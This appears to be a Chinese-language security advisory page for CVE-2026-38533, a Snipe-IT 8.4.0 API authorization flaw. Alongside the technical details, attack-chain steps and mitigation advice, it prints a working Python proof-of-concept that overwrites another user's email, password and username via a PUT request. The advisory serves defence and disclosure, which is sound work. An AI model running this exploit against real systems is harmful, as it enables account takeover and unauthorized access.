CVE-2026-38533 CVSS 6.5 中危

CVE-2026-38533 Snipe-IT权限提升漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38533

漏洞类型

权限提升

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Snipe-IT

漏洞概述

Snipe-IT v8.4.0版本的/api/v1/users/{id}接口存在不恰当授权漏洞。拥有users.edit权限的普通认证用户，可以利用该漏洞发送特制的PUT请求，绕过权限校验修改其他非管理员用户的敏感身份验证及账户状态字段。此漏洞可能导致攻击者非法控制用户账户，严重影响系统完整性和账户安全。

技术细节

该漏洞源于Snipe-IT在处理用户信息更新请求时的逻辑缺陷。虽然系统要求用户具有users.edit权限才能访问修改接口，但在权限校验逻辑中，未严格区分当前用户与目标用户的角色关系，导致存在越权操作（IDOR）。攻击者获取目标用户ID后，构造包含修改敏感字段（如密码、邮箱等）的PUT请求发送至/api/v1/users/{id}。服务器仅验证发起者是否具备通用编辑权限，未验证其对特定目标的操作权限，从而执行了修改操作，导致低权限用户能接管或破坏其他用户账户。

攻击链分析

STEP 1

侦察与枚举

攻击者发现Snipe-IT实例，并利用API或Web界面枚举出目标用户的ID。

STEP 2

获取低权限凭证

攻击者注册或获取一个具有users.edit权限的普通用户账户凭证。

STEP 3

构造恶意请求

攻击者构造针对/api/v1/users/{target_id}的PUT请求，在请求体中注入需要修改的敏感字段（如重置密码或更改邮箱）。

STEP 4

执行越权操作

服务器接收请求，由于权限校验逻辑缺陷，允许攻击者修改目标用户信息。

STEP 5

接管账户

攻击者利用修改后的信息（如新密码）成功登录目标用户账户，达成权限提升或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Configuration target_url = "http://target-snipe-it.com/api/v1/users/{target_user_id}" api_token = "YOUR_VALID_API_TOKEN" # User with users.edit permission headers = { "Authorization": f"Bearer {api_token}", "Content-Type": "application/json", "Accept": "application/json" } # Malicious payload to modify sensitive fields # Exploiting the improper authorization to change email/password payload = { "email": "[email protected]", "password": "NewPassword123!", "username": "hacked_account" } # Send the exploit request response = requests.put(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! User data modified.") else: print(f"[-] Exploit failed. Status: {response.status_code}") print(response.text)

影响范围

Snipe-IT 8.4.0

防御指南

临时缓解措施

在应用补丁前，建议管理员暂时撤销非核心管理员的users.edit权限，或在WAF层部署规则，拦截对/api/v1/users/端口的非管理员PUT请求操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表